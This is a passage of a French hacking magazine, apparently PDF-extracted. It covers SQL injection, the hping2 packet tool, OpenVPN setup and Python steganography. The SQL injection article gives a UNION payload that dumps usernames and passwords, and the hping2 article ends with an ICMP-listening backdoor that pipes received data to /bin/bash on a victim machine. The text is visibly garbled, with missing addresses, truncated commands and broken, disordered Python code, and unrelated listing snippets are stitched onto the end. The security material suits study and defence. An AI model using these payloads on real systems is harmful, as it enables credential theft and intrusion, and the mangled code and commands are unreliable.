autre valeur. c - Obtenir un mot de passe La partie précédente, où il était question de deviner le mot de passe d un utilisateur, nécessitait de connaître le nom de l utilisateur, et encore mieux le nom de l administrateur, malheureusement ce n est pas toujours le cas. Qui plus est cette méthode est assez longue et fastidieuse. Pour éviter cela nous allons tenter de découvrir directement le mot de passe des membres, et avec un peu de chance celui de l administrateur. Cette technique nécessite l utilisation du mot-clé UNION. Je vous invite à visiter le lien suivant pour comprendre son utilité, l explication du langage SQL dépassant cet article : Pour cela imaginons une requête listant le pseudo des utilisateurs ainsi que leur SELECT pseudo, FROM table WHERE pseudo LIKE '%$pseudo%' ORDER BY name Nous allons donc injecter dans le champ $speudo la valeur ' union all select pseudo as pseudo, password as from users # La requête devient alors : SELECT pseudo, FROM table WHERE pseudo LIKE '%' union all select pseudo as pseudo, password as from users #%' ORDER BY name Nous obtiendrons donc quelque chose de ce style : admin marco gégé admin admin1234 marco albator33 gégé 12conanlebarbare34 On remarque facilement ce qu il s est passé. Le script a bien affiché les pseudos avec leur , mais il a également ajouté par la suite le pseudo des membres suivi de leur mot de passe!! Et par chance ils ne sont pas crypté, que demander de plus ^^ HacKethiC N 1 9

10 MOYENS DE PROTECTION Comme vous l avez certainement remarqué les injections SQL sont très dangereuses et les attaques peuvent être critiques. Heureusement pour les développeurs Web il existe des techniques permettant de contrer ces attaques. 1 - Le fichier php.ini Tout d abord signalons l existence du fichier php.ini, qui est le fichier de configuration de PHP. Ce fichier est utile sur beaucoup de points, mais dans notre cas il nous servira à éviter les injections SQL grâce aux magic quotes. Cette fonction ajoutera automatiquement, et ce même si le développeur n y a pas prêter attention, des antislashs devant les guillemets ( ' ' ) ainsi que devant les simples quotes ( ' ). Notons toutefois que ces magics quotes sont facilement contournables, mais nous verrons cela dans un prochain article. Les techniques employées ici ne sont que la base des injections SQL, néanmoins nous aurons été plus loin que le très connu 'OR 1=1. De plus comme vous avez pu le remarquer les exemples nécessitaient de connaitre certains renseignements sur les tables attaquées, comme le nom de certains champs. Nous verrons cependant dans un prochain article les Blind SQL Injections, littéralement les Injections SQL à l aveugle. Ce type d attaque nous permettra d attaquer un site web sans en connaitre au préalable la BDD. SOURCES La fonction addslashes() Cette fonction a elle-aussi pour but de rajouter des antislashs devant les guillemets et les simples quotes. 3 - La fonction mysql_real_escape_string() Cette fonction est à conseiller par rapport à addslashes() car celle-ci protègera également les \n et \r. Un exemple de protection : $login = mysql_real_escape_string($_post[ login ]) ; $password = mysql_real_escape_string($_post[ password ]) ; $sql = mysql_query( SELECT uid FROM users WHERE login = $login AND password = $password ); Ici l injection SQL n est pas possible, les variables étant toutes les deux protégées. Conclusion Vous l aurez compris les injections SQL peuvent être critiques pour un site web communicant avec une base de données. De nombreuses informations, parfois confidentielles peuvent facilement être découvertes si le développeur n a pas pris soin de protéger les variables envoyées aux scripts. Une publication La Pieuvre Noire 111, avenue Victor Hugo Paris cedex 16 Rédaction : HacKethiC Team Maquette : Raph Imprimé par ROTO GARONNE Estillac Commission paritaire : en cours Dépôt légal à parution ISSN en cours LPN 2009 Directeur de la Publication : O. André HacKethiC 1 an = 4 numéros = 12 euros Bulletin d abonnement à découper ou à recopier et à envoyer accompagné de votre réglement de 12 euros à l ordre de LPN - 111, avenue Victor Hugo PARIS cedex 16 NOM : PRENOM : ADRESSE : CODE POSTAL : VILLE : HacKethiC N 1 10

11 L'outil HPING2 PAR FLORENT DERUDAS Ping est sans aucun doute la commande la plus utilisée par l'ensemble des exploitants d'un réseau informatique ; elle permet de vérifier très simplement la connectivité avec un hôte distant du réseau au moyen du protocole ICMP. Un simple ping n'offre cependant pas de réelle information sur la stratégie de sécurité de l'hôte distant (firewall, règle de filtrage, etc). Cet article sera donc une présentation de son grand frère «hping2». Il détaillera son fonctionnement ainsi que quelques options avancées. Introduction Hping2 sera particulièrement intéressant pour les administrateurs réseaux, ou tout autre personne, désirant mettre à l'épreuve un dispositif de sécurité, comme un firewall par exemple. Hping2 est une alternative à la commande de base ping. Il est relativement évolué est permet de gérer plusieurs protocoles. On peut donc classiquement effectuer des requêtes ICMP, mais aussi envoyer des requêtes TCP ou UDP sur n'importe quel port pour vérifier son état, et ceci de façon discrète. Le principal avantage de cet outil est qu'il retourne, en fonction des paramètres qui lui sont passés, une grande variété de réponses de la part des cibles. Nous pourrons, entre autres, de détecter des paquets ouverts, bloqués, rejetés ou abandonnés. Cet outil réseau offre aussi la possibilité de modifier manuellement les champs des headers à la ligne de commandes ou encore de faire du transfert de fichier via les protocoles supportés. On peut notamment insérer des données malveillantes dans les paquets (buffer overflow, trojan,...) et les utiliser pour pénétrer des réseaux. Je vous propose de découvrir cet utilitaire au travers d'exemples de plus en plus avancés, puis de conclure sur une utilisation «détournée» de hping2 en tant que troyen. Voici une présentation des commandes de base de cet outil. retrouve le «ping classique» avec -c pour spécifier le nombre de paquet à envoyer : # hping2 -c HPING (eth ): icmp mode set, 28 headers + 0 data bytes len=46 ip= ttl=64 id=44279 icmp_seq=0 rtt=0.8 ms hping statistic packets transmitted, 1 packets received, 0% packet loss round-trip min/avg/max = 0.8/0.8/0.8 ms Par défaut on observe bien que les paquets émis sont en TCP : # hping2 -c HPING (eth ): NO FLAGS are set, 40 headers + 0 data bytes len=46 ip= ttl=64 DF id=2679 sport=0 flags=ra seq=0 win=0 rtt=0.7 ms len est la taille, en octets, des données capturées dans la couche liaison de données en excluant la taille de l entête de liaison de données. ip est l adresse ip source. flags sont les drapeaux TCP, R pour RESET, S pour SYN, A pour ACK, F pour FIN, P pour PUSH, U pour URGENT, X pour 0x40 non standard, Y pour 0x80 non standard. Si la réponse contient DF l entête IP possède le bit don t fragment (ne pas fragmenter) positionné. seq est le numéro de séquence du paquet, obtenu en utilisant le port source pour les paquets TCP/UDP, le champ séquence pour les paquets ICMP. id est le champ IP ID. win est la taille de la fenêtre TCP rtt est le "round trip time" (ndt : temps aller-retour) en millisecondes. L'option -t permet de spécifier le champ TTL (Time To Live) du protocole IP. La majorité des champs du protocole IP sont modifiables par des arguments de cette manière. >hping t 3 Par défaut, hping2 envoie des requêtes TCP sur le port 0 de l'hôte de destination, avec aucun drapeau (flag) positionné, ce qui aura pour effet de ne pas être inscrit dans les logs dans la plupart des cas. Le retosera une réponse TCP avec les drapeaux RST et ACK positionnés si l'hôte distant est connecté avec une configuration TCP/IP fonctionnelle. Comme nous l'avons dit précédemment, hping2 supporte plusieurs protocoles, la spécification d'un protocole particulier est a passer dans la ligne de commande, avec : - 0 active le mode RAW IP, qui permet de signer la requête. - 1 sélectionne de mode ICMP, qui équivaut alors à la simple commande ping - 2 sélectionne le mode UDP, qui émet des segments UDP - 9 active le mode listen, qui permet de recevoir des paquets signés Cette option -p précise le port destination que l'on veut joindre. Cet outil est très pratique pour faire du scannage de port et ainsi déterminer les sécurités utilisées par un firewall par exemple : # hping2 -c p 53 HPING (eth ): NO FLAGS are set, 40 headers + 0 data bytes len=46 ip= ttl=64 DF id=2682 sport=53 flags=ra seq=0 win=0 rtt=0.8 ms hping statistic packets transmitted, 1 packets received, 0% packet loss round-trip min/avg/max = 0.7/0.7/0.7 ms hping statistic packets transmitted, 1 packets received, 0% packet loss round-trip min/avg/max = 0.8/0.8/0.8 ms HacKethiC N 1 11

12 L'option -s permet de spécifier le port source de la requête. Cette fonction trouve son utilité lorsqu'on veut passer outre un firewall particulièrement fermé ne laissant rentrer que des paquets en provenance d'un certain port (ici 53 : requête DNS) : # hping2 -c s 53 HPING (eth ): NO FLAGS are set, 40 headers + 0 data bytes len=46 ip= ttl=64 DF id=2704 sport=0 flags=ra seq=0 win=0 rtt=0.7 ms hping statistic packets transmitted, 1 packets received, 0% packet loss round-trip min/avg/max = 0.7/0.7/0.7 ms Bien d'autres champs sont modifiables par les différentes options, on peut par exemple citer les champs seq, window, ainsi que tous les flags que l'on peut spécifier un à un. Il est aussi possible de réaliser des scans avancés avec hping, de retrouver les services en écoute ou de visualiser les différents flags dans les paquets : # hping2 --scan S Scanning ( ), port ports to scan, use -V to see all the replies port serv name flags ttl id win telnet :.S..A www :.S..A All replies received. Done. On scanne du port 20 au port 80, et l'option -S nous permet de fixer le drapeau TCP SYN dans nos paquets (indique une demande d'établissement de connexion). Il est à noter que Le mot spécial «all» peut être utiliser pour la plage , et que le mot spécial «known» inclut tous les ports listés dans /etc/services. On peut aussi ajouter que lorsque hping est utilisé en tant que scanner de port, il conserve toutes ses fonctionnalités et il est possible de changer la taille de la fenêtre TCP, le TTL, contrôler la fragmentation IP comme habituellement, et ainsi de suite. Lors d'un scan les champs IP ID, TCP win, TTL, et ainsi de suite, montrent des détails intéressants que la plupart des scanner de ports ne révelent pas. N oubliez pas de regarder ces informations additionnelles! Un ping TCP avec spoofing est aussi supporté, l'option -a permet de fixer une fausse adresse source, cette option assure que le système cible n obtiendra pas votre adresse réelle # hping a HPING (eth ): NO FLAGS are set, 40 headers + 0 data bytes Dans ce mode, vous n aurez bien sur pas les réponses, qui seront envoyés à la machine spécifiée par l option -a (des méthodes existent cependant pour récupérer les réponses). Et pour terminer cette présentation, voici une petite manipulation qui va nous permettre d'avoir la main sur un système au moyen d'une utilisation avancée de l'outil hping, à savoir le transfert d'information au travers du protocoles ICMP. Hping2 permet effectivement d'envoyer des paquets contenant des données définies par l'utilisateur. Pour inclure les données à envoyer il nous faut utiliser l'option -E en spécifiant le chemin du fichier contenant les informations à envoyer. Hping2 permet aussi d'envoyer des paquet contenant une signature spécifiée par l'utilisateur sous forme de chaîne de caractères. L'option -e est alors nécessaire. Du côté client, la commande à envoyer peut donc ressembler à ceci : > hping e SIGNATURE -E fichierdecommande.lst -d 50-1 L'option -1 précise le protocole à utiliser (icmp), -d 50 nous sert à fixer la taille du corps du paquet, -E nous permet d'utiliser le contenu du fichier fichierdecommande.lst pour remplir les données du paquet et -e nous permet de préciser notre propre signature. Pour que la manœuvre puisse fonctionner, il faut placer sur la machine «victime» hping2 en mode écoute grâce à l'option --listen. En utilisant cette option hping2 attend les paquets qui contiennent la signature et exporte les données du paquet. Il ne nous reste plus qu'à rediriger ces données vers quelque chose d'intéressant, et le tour est joué : > hping2 --listen SIGNATURE -1 /bin/bash Toujours -1 pour spécifier le protocole, les données retrouvées après la signature dans le paquet ICMP seront envoyées vers un shell! Il ne s'agit là que d'un exemple d'utilisation, mais les possibilités d'exploitations sont nombreuses. Le fait de pouvoir forger «à la main» des paquets, aussi bien au niveau des en-têtes que des données peut nous aider à réaliser de nombreux test, sur les règles des firewall ou sur la prise d'information dans la pile TCP/IP de la machine distante en analysant les éventuelles réponses. Conclusion Hping montre de réels atouts et de nombreuses fonctionnalités. En effet, il apporte le pouvoir de réaliser simplement des requêtes entièrement paramétrables avec les protocoles ICMP/TCP/UDP. Cette possibilité permet plusieurs fonctions avancées qui s'avèrent très utiles, comme tester la politique d'un firewall sur des ports bien particuliers, ou le transfert de fichiers à travers un firewall, ou encore le test d'une liaison. Au final, on peut dire que hping apport à la commande ping l'aspect quantitatif, c'est à dire qu'en plus de savoir si un hôte est connecté ou non, on peut obtenir de nombreux renseignements sur la sécurité de cet hôte et de la liaison qui nous joint à lui. HacKethiC N 1 12

13 Une solution VPN avec OpenVPN NICOLAS VOUTON (TILILOUBLOU) Mise en place d'un tunnel VPN grâce à OpenVPN utilisant SSL. Introduction Nous allons vous proposer maintenant la mise en place d'une solution VPN grâce à OpenVPN. Nous avons décidé de prendre OpenVPN pour trois bonnes raisons : sa simplicité, sa portabilité et son prix. En effet, OpenVPN est une solution gratuite sous licence GNU/GPL, fonctionnant sous Windows (aprrès Windows 2000),Mac OS X, Linux, BSD*, Solaris. OpenVPN, c'est quoi? Créé en 2002, OpenVPN est un outil open source utilisé pour construire des VPNs site à site avec le protocole SSL/TLS ou avec des clefs partagées. Son rôle est de "tunneliser", de manière sécurisée, des données sur un seul port TCP/UDP à travers un réseau non sûr comme Internet et ainsi établir des VPNs. Création des clefs publique/privée Editez le fichier «/etc/ssl/openssl.cnf» puis modifier la variable dir=./democa tel que dir=/etc/ssl/ca/ par exemple. Où /etc/ssl/ca/ sera le repertoire contenant vos clefs de sécurité. Vous pouvez aussi modifier certaines varibles dans ce fichier de configuration tel que : default_days = 3650 default_bits = 2048 countryname_default = FR stateorprovincename_default = Nord-pas-de-Calais localityname_default = Maubeuge 0.organizationName_default = Tililoublou commonname_default = vpn.tililoublou.net address_default = Ensuite assurez-vous que la variable certificate est bien initialisé comme ceci : certificate = $dir/cacert.pem CONNEXION VPN VUE SHÉMATIQUEMENT Tunneling OpenVPN crée un tunnel TCP ou UDP et ensuite chiffre les données à l'intérieur de celui-ci. Le port par défaut utilisé par OpenVPN est le port UDP 1194, basé sur un assignement officiel de port par l'iana. Vous pouvez toutefois utiliser n'importe quel autre port et, depuis la version 2.0, un port unique peut être utilisé pour plusieurs tunnels sur le serveur OpenVPN. Sécurité Lors de l'utilisation de clefs statiques, les deux passerelles VPN partagent la même clef pour chiffrer et déchiffrer les données. Dans ce cas, les configurations seront très simples mais le problème peut venir du fait qu'il est parfois nécessaire de transmettre la clef (à travers un canal sécurisé bien sûr) à quelqu'un dont vous n avez pas confiance à l'autre bout du tunnel. L'infrastructure à clef publique (PKI pour Public Key Infrastructure en anglais) est utilisée pour résoudre ce problème. Elle est basée sur le fait que chaque partie possède deux clefs, une clef publique connue de tout le monde et une clef privée tenue secrète. Ce processus est utilisé par OpenSSL,pour authentifier les machines VPN avant le chiffrement des données. Regardons les avantages des deux modes : cacert.pem est votre certificat dit CA ( Autorité de certification ) Ensuite nous allons préparer nos repertoire pour générer les certificats : mkdir -p /etc/ssl/ca cd /etc/ssl/ca mkdir -p {certs,crls,newcerts,private} touch index.txt echo 01 > serial echo 01 > openssl req -nodes -new -x509 -keyout private/cakey.pem -out cacert.pem -days 3650 # Creer une liste de révocation de certificats openssl ca -gencrl -out crls/crl.pem # Generation de clé dite Diffie Hellman openssl dhparam -out dh1024.pem 1024 Création des nouveaux certificats # Création des certificats publique et privé. cd certs openssl req -nodes -new -keyout vpn.tililoublou.net.key -out vpn.tililoublou.net.csr # Signer le certificat openssl ca -out vpn.tililoublou.net.crt -in vpn.tililoublou.net.csr -policy policy_anything Vous devriez avoir 3 fichiers dans le répertoire certs : Mode OpenVPN: Clefs partagées SSL Mode de cryptographie: Symétrique Asymétrique/Symétrique Implémentation: Plus facile Plus compliquée Vitesse: Plus rapide Plus lente Consommation CPU: Plus petite Plus grande Echange des clefs: OUI NON Renouvellement des clefs: NON OUI Authentification des passerelles: NON OUI vpn.tililoublou.net.crt vpn.tililoublou.net.key vpn.tililoublou.net.csr # Le certificat du serveur signé # La clé privé du certificat du serveur. # Ce fichier est celui que les hackers cherchent. # Donc gardez ce fichier en lieu sûr! # Clé privée cryptée pour le certificat du server. HacKethiC N 1 13

14 Mise en place d OpenVPN ARCHITECTURE CLIENT/SERVER Parmi les deux boitiers OpenVPN, il est nécessaire d'en déclarer un en tant que serveur et l'autre en tant que client. Dans certains scenarios, chaque boitier peut être déclaré comme serveur ou client, mais dans d'autres, il est obligatoire de choisir spécifiquement un boitier comme serveur et l'autre comme client, regardons quand. Avant d'établir le VPN SSL, le client essaie d'abord de joindre le serveur sur un port spécifique, le serveur n'ayant pas besoin d'atteindre le client. Prenons un exemple où vous êtes dans un environnement scolaire et voulez établir un VPN avec un équipement directement connecté à Internet, disons un équipement à votre domicile. Dans ce cas usuel, le client peut atteindre le serveur mais pas le contraire, Ceci est du au fait que le client est situé dans un réseau local et se connecte à Internet via un proxy et un Pare-feu qui vont changer son adresse IP source par leur propre adresse IP. Bien sûr, quand le tunnel est créé, le trafic en son intérieur est bidirectionnel. Configuration # ADRESSE IP DU SERVEUR# L'adresse IP WAN du client n'est pas# requise # TUNNEL TCP OU UDP# Tunnel UDP est recommandéproto udp# PORT TCP OU UDP port 1194 # TUNNEL ETHERNET OU IP # "dev tun" will create a routed IP tunneldev tun # SERVEUR SSL/TLS tls-server # CERTIFICATS ET CLEF PRIVEE # Certificat de l'autorité (clef publique du CA) ca ca.crt# Certificat du server (clef publique du serveur) cert server.crt # Clef privée du serveur key server.key # Paramètres Diffie-Hellman dh dh1024.pem # ALGORITHME DE CHIFFREMENTcipher AES-256-CBC # ALGORITHME DE HACHAGEauth MD5 # PARAMETRES DHCP# Etendue DHCP# Le serveur s'attribue la première# adresse de l'étendueserver # VERBOSITE DU JOURNAL# Paramétrage de la verbosité du journal, 0=min 15=maxverb 3 # SECURITE OPENVPN - Linux seulement # Utilisateur OpenVPNuser nobody# Après initialisation, OpenVPN peut# seulement accéder à un dossier# Le dossier peut être vide# Limitation du processus OpenVPNchroot /etc/openvpn FICHIER DE CONFIGURATION CONNEXION VPN À TRAVERS UN FIREWALL Dans notre exemple, nous allons appeler ce fichier {client,serveur}.conf et le sauver dans le dossier /home/$user/openvpn/ ou "C:\Program Files\OpenVPN\config\" selon s'il s'agit d'une machine Linux/Unix ou Microsoft. # ADRESSE IP DU SERVEUR remote # # TUNNEL TCP OU UDP # Tunnel UDP est recommandé proto udp # PORT TCP OU UDP port 1194 # TUNNEL ETHERNET OU IP # "dev tun" will create a routed IP tunnel dev tun # CLIENT SSL/TLS tls-client # CERTIFICATS AND CLEF PRIVEE # Certificat de l'autorité (clef publique du CA) ca ca.crt # Certificat du client (clef publique du serveur) cert client.crt # Clef privée du client key client.key # Aucun paramètre DH sur le client # # ALGORITHME DE CHIFFREMENT cipher AES-256-CBC # ALGORITHME DE HACHAGE auth MD5 # LE CLIENT ACCEPTE LES OPTIONS # DU SERVEUR # Le client devrait accepter les options # poussées par le serveur pull # VERBOSITE DU JOURNAL # Paramétrage de la verbosité du journal, 0=min 15=max verb 3 # SECURITE OPENVPN - Linux seulement # Utilisateur OpenVPN user nobody # Après initialisation, OpenVPN peut # seulement accéder à un dossier # Le dossier peut être vide # Limitation du processus OpenVPN chroot /etc/openvpn/ Enfin, il ne reste plus qu'à lancer OpenVPN comme ceci : $ openvpn /home/$user/openvpn/serveur.conf $ openvpn /home/$user/openvpn/client.conf Vous pouvez maintenant tester la connectivité en faisant un ping : $ ping EXEMPLE PING zeus# ping PING ( ): 56 data bytes 64 bytes from : icmp_seq=0 ttl=64 time=1.944 ms 64 bytes from : icmp_seq=1 ttl=64 time=1.012 ms 64 bytes from : icmp_seq=2 ttl=64 time=1.021 ms ^C ping statistics packets transmitted, 3 packets received, 0% packet loss round-trip min/avg/max/stddev = 1.012/1.326/1.944/0.437 ms HacKethiC N 1 14

15 EXEMPLE SERVEUR saratov# openvpn server.conf Wed Dec 3 00:17: OpenVPN i386-portbld-freebsd7.0 [SSL] [LZO] built on Nov Wed Dec 3 00:17: Diffie-Hellman initialized with 1024 bit key Wed Dec 3 00:17: TLS-Auth MTU parms [ L:1553 D:138 EF:38 EB:0 ET:0 EL:0 ] Wed Dec 3 00:17: gw Wed Dec 3 00:17: TUN/TAP device /dev/tun0 opened Wed Dec 3 00:17: /sbin/ifconfig tun mtu 1500 netmask up Wed Dec 3 00:17: /sbin/route add -net add net : gateway Wed Dec 3 00:17: Data Channel MTU parms [ L:1553 D:1450 EF:53 EB:4 ET:0 EL:0 ] Wed Dec 3 00:17: chroot to '/etc/openvpn/' and cd to '/' succeeded Wed Dec 3 00:17: UID set to nobody Wed Dec 3 00:17: UDPv4 link local (bound): [undef]:1194 Wed Dec 3 00:17: UDPv4 link remote: [undef] Wed Dec 3 00:17: MULTI: multi_init called, r=256 v=256 Wed Dec 3 00:17: IFCONFIG POOL: base= size=62 Wed Dec 3 00:17: Initialization Sequence Completed Wed Dec 3 00:17: MULTI: multi_create_instance called Wed Dec 3 00:17: :1194 Re-using SSL/TLS context Wed Dec 3 00:17: :1194 Control Channel MTU parms [ L:1553 D:138 EF:38 EB:0 ET:0 EL:0 ] Wed Dec 3 00:17: :1194 Data Channel MTU parms [ L:1553 D:1450 EF:53 EB:4 ET:0 EL:0 ] Wed Dec 3 00:17: :1194 Local Options hash (VER=V4): '237597c6' Wed Dec 3 00:17: :1194 Expected Remote Options hash (VER=V4): '2c54dbbd' Wed Dec 3 00:17: :1194 TLS: Initial packet from :1194, sid=21f8df77 22fad4ab Wed Dec 3 00:17: :1194 VERIFY OK: depth=1, Wed Dec 3 00:17: :1194 VERIFY OK: depth=0, Wed Dec 3 00:17: :1194 Data Channel Encrypt: Cipher 'AES-256-CBC' initialized with 256 bit key Wed Dec 3 00:17: :1194 Data Channel Encrypt: Using 128 bit message hash 'MD5' for HMAC authentication Wed Dec 3 00:17: :1194 Data Channel Decrypt: Cipher 'AES-256-CBC' initialized with 256 bit key Wed Dec 3 00:17: :1194 Data Channel Decrypt: Using 128 bit message hash 'MD5' for HMAC authentication Wed Dec 3 00:17: :1194 Control Channel: TLSv1, cipher TLSv1/SSLv3 DHE-RSA-AES256-SHA, 1024 bit RSA Wed Dec 3 00:17: :1194 [client] Peer Connection Initiated with :1194 Wed Dec 3 00:17: client/ :1194 MULTI: Learn: > client/ :1194 Wed Dec 3 00:17: client/ :1194 MULTI: primary virtual IP for client/ :1194: Wed Dec 3 00:17: client/ :1194 PUSH: Received control message: 'PUSH_REQUEST' Wed Dec 3 00:17: client/ :1194 SENT CONTROL [client]: 'PUSH_REPLY,route ,ifconfig ' (status=1) EXEMPLE CLIENT zeus# openvpn client.conf Wed Dec 3 00:28: OpenVPN i386-portbld-freebsd6.2 [SSL] [LZO] built on Dec Wed Dec 3 00:28: Control Channel MTU parms [ L:1553 D:138 EF:38 EB:0 ET:0 EL:0 ] Wed Dec 3 00:28: Data Channel MTU parms [ L:1553 D:1450 EF:53 EB:4 ET:0 EL:0 ] Wed Dec 3 00:28: Local Options hash (VER=V4): '2c54dbbd' Wed Dec 3 00:28: Expected Remote Options hash (VER=V4): '237597c6' Wed Dec 3 00:28: NOTE: chroot will be delayed because of --client, --pull, or --up-delay Wed Dec 3 00:28: NOTE: UID/GID downgrade will be delayed because of --client, --pull, or --up-delay Wed Dec 3 00:28: UDPv4 link local (bound): [undef]:1194 Wed Dec 3 00:28: UDPv4 link remote: :1194 Wed Dec 3 00:28: TLS: Initial packet from :1194, sid=2bc ca3a282 Wed Dec 3 00:28: VERIFY OK: depth=1, Wed Dec 3 00:28: VERIFY OK: depth=0, Wed Dec 3 00:28: Data Channel Encrypt: Cipher 'AES-256-CBC' initialized with 256 bit key Wed Dec 3 00:28: Data Channel Encrypt: Using 128 bit message hash 'MD5' for HMAC authentication Wed Dec 3 00:28: Data Channel Decrypt: Cipher 'AES-256-CBC' initialized with 256 bit key Wed Dec 3 00:28: Data Channel Decrypt: Using 128 bit message hash 'MD5' for HMAC authentication Wed Dec 3 00:28: Control Channel: TLSv1, cipher TLSv1/SSLv3 DHE-RSA-AES256-SHA, 1024 bit RSA Wed Dec 3 00:28: [serveur] Peer Connection Initiated with :1194 Wed Dec 3 00:28: SENT CONTROL [serveur]: 'PUSH_REQUEST' (status=1) Wed Dec 3 00:28: PUSH: Received control message: 'PUSH_REPLY,route ,ifconfig ' Wed Dec 3 00:28: OPTIONS IMPORT: --ifconfig/up options modified Wed Dec 3 00:28: OPTIONS IMPORT: route options modified Wed Dec 3 00:28: gw Wed Dec 3 00:28: TUN/TAP device /dev/tun0 opened Wed Dec 3 00:28: /sbin/ifconfig tun mtu 1500 netmask up Wed Dec 3 00:28: /sbin/route add -net add net : gateway Wed Dec 3 00:28: chroot to '/etc/openvpn/' and cd to '/' succeeded Wed Dec 3 00:28: UID set to nobody Wed Dec 3 00:28: Initialization Sequence Completed HacKethiC N 1 15

16 Stéganographie en python Georges Sand utilisait cette technique pour converser avec Chopin : un texte en cachait un autre. Depuis, les méthodes de stéganographie ont bien évolué. Il est possible d'utiliser des images, des fichiers textes, voire des vidéos pour «camoufler» du texte. De nombreux programmes proposent des solutions de stéganographie reprennant ces façons d'opérer. Cependant il n'en existe que quelques uns de libre. La librairie Numpy de Python permet de faire de la manipulation d'images très facilement, notamment en mettant à disposition des fonctions, toutes prêtes, pour récupérer les valeurs RVB (Rouge, Vert, Bleu) de chaque pixel. La méthode utilisée ici est assez simple. Une image est composée de plusieurs centaines de pixels. Chacun d'entre eux possède trois valeurs allant de 0 à 255 pour les couleurs rouge, verte, et bleue. La couleur d'un pixel dépend de ces valeurs : plus une valeur sera importante, plus la composante associée sera claire, le mélange des trois composantes forme la couleur du pixel. On peut donc voir une image comme un tableau à trois dimensions de Longueur_image x Largueur_image x 3 (chaque case symbolisant un pixel, est en réalité un tableau de trois cases comportant les valeurs RVB). Le schéma suivant illustre cela. La méthode utilisée ici consiste à traduire chaque caractère d'une phrase en code ASCII, puis à convertir cette valeur en binaire et la stocker dans un tableau de huit cases. L'opération est réitérée jusqu'à ce que tout les caractères de la phrase aient été traduits. L'ensemble des tableaux est concaténé. On parcourt ensuite le tableau résultant et on vérifie la parité de la valeur de composante rouge de chaque pixel. Plusieurs cas de figure peuvent alors se présenter: si le nombre est paire (comme 4,122,234, ) et que la case extraite correspond à 1, alors la valeur de la composante est transformée en nombre impair (en ajoutant 1 à sa valeur initiale), si la case extraite correspond à 0, et que le nombre de la valeur de la composante est pair, alors cette valeur est conservée ; elle demeure inchangée, si la case extraite possède comme valeur 0 et que la composante est impaire, alors la composante est convertie en valeur paire (en ajoutant 1 SAUF si la valeur est 255, auquel cas on retire 1), enfin si la case extraite correspond à 1, et que le nombre de la valeur de la composante est impair alors cette valeur est conservée ; elle demeure inchangée. Retrouver le texte consistera a effectuer l'opération inverse, à savoir évaluer la parité et placer 1 dans un tableau si la valeur est impaire et 0 dans le cas contraire. On découpe ensuite ce tableau en tableaux plus petits de huit cases chacun : un octet que l'on reconvertit en code ASCII puis en caractère. Un système de clef est également utilisé, il s'agit ici de la longueur de la chaîne de caractères. Ce mécanisme peut être d'avantage sécurisé, mais le but est ici de mettre en application une technique de stéganographie et non de sécurisation de clef. Le code des différentes fonctions est donné ici, des commentaires y ont été insérés afin de faciliter la compréhension de celui-ci. #!/usr/bin/python #-*- coding:utf-8 -*- import PIL, import Image, import numpy #ouverture d'une nouvelle image def openpicture(image): Img = Image.open(str(image)) return imgdata newimg = image return newimg[i][c] #change la couleur d'un pixel def changecolor(i, c, image, valeur): newimg = image newimg[i][c] = valeur #convertir une chaine de caracteres en une valeur binaire def stringconverttobin(val): tab=[reduce(str. add,[['0','1'][((2**i)&ord(tst))>0] for i in range(8)[::-1]]) for tst in val] strret='' for i in range(len(tab)): strret=strret+tab[i] #convertion de liste en string return strret #retourne vrai si le parametre est pair, et faux sinon if (nbr%2==0): return True return False #creation d'une nouvelle image, copie de l'image de base C0R3Y La stéganographie est un procédé de sécurisation des données très ancien. Il s'agit d'une alternative à la cryptographie consistant non pas à rendre un texte indéchiffrable mais plutôt à le cacher dans une image ou un autre texte. Nous verrons dans cet article comment cacher des chaînes de caractères dans une image avec Python et la librairie Numpy. def createpicture(image,chaine): tab = stringconverttobin(chaine) img = openpicture(image) Img = list(img) for j in range(len(tab)): b=list(img[j]) Img[j]=b Imgsize = Image.open(image) ind=true for i in range(len(tab)): if (getcolor(i,0,img) == 255): ind=true else: ind=false if (paritytest(getcolor(i,0,img))==false and tab[i]=='0'): if (getcolor(i,0,img) == 255 and ind==true): changecolor(i,0,img,getcolor(i,0,img)-1) ind=true if (getcolor(i,0,img)!= 255 and ind==false): changecolor(i,0,img,getcolor(i,0,img)+1) if (paritytest(getcolor(i,0,img))==true and tab[i]=='1'): changecolor(i,0,img,getcolor(i,0,img)+1) for x in range(len(tab)): b=tuple(img[x]) Img[x]=b Img2 = tuple(img) Copie = Image.new("RGB",Imgsize.size) Copie.putdata(list(Img2)) #Copie.show() print "clef = ",len(str(chaine))*8 Copie.save(fp="/home/c0r3y/test.png") #transforme un tableau binaire (extrait de l'image) en chaine de caracteres def gettextinpicture(image,clef): Img = openpicture(image) Img = list(img) str3="" str2="" for i in range(clef): col = getcolor(i,0,img) if (paritytest(col)==true): str2=str2+"0" else : str2=str2+"1" str = str3.join([chr(int(str2[i:i+8],2)) for i in range(0,len(str2),8)]) return str On teste la suite de fonction qui vient d'être définie : chaine=raw_input() createpicture("/home/c0r3y/images/images.jpeg","chaine") print gettextinpicture("/home/c0r3y/test.png",clef) Clef est a remplacer par la longueur de la chaîne de caractères passée en paramètre de la fonction createpicture (elle est affichée a l'écran durant l'exécution de la fonction). Gettextinpicture affichera le texte retrouvé dans l'image. Nous avons vu que dissimuler des informations au sein d'une image peut se faire assez simplement. D'autres méthodes, plus ou moins efficaces, existent et celle donnée ici n'est qu'une illustration. Le mécanisme de clef peut être d'avantage sécurisé, par exemple en appliquant un système de cryptage dessus. Il existe également d'autres librairies python permettant de manipuler les images, mais aussi du son (mp3) voir des vidéos (flv) et la stéganographie peut s'appliquer à ces supports, autant ne pas s'en priver! HacKethiC N 1 16

Nmap (Network Mapper) Outil d exploration réseau et scanneur de ports/sécurité

Nmap (Network Mapper) Outil d exploration réseau et scanneur de ports/sécurité Nmap (Network Mapper) Outil d exploration réseau et scanneur de ports/sécurité 1. Présentation Nmap est un outil open source d'exploration réseau et d'audit de sécurité, utilisé pour scanner de grands

Plus en détail

DIGITAL NETWORK. Le Idle Host Scan

DIGITAL NETWORK. Le Idle Host Scan DIGITAL NETWORK Siège : 13 chemin de Fardeloup 13600 La Ciotat Siret : 43425494200015 APE : 722 Z www.digital network.org www.dnsi.info Laboratoires : 120 Avenue du Marin Blanc, ZI Les Paluds, 13685 Aubagne

Plus en détail

TP 1 - Prise de contact avec Snort, scapy

TP 1 - Prise de contact avec Snort, scapy TP 1 - Prise de contact avec Snort, scapy 0. Initialisation du TP Installer les paquets python-scapy, snort, nmap. 1. Présentation de SNORT v2.8.5 La détection d intrusion consiste en un ensemble de techniques

Plus en détail

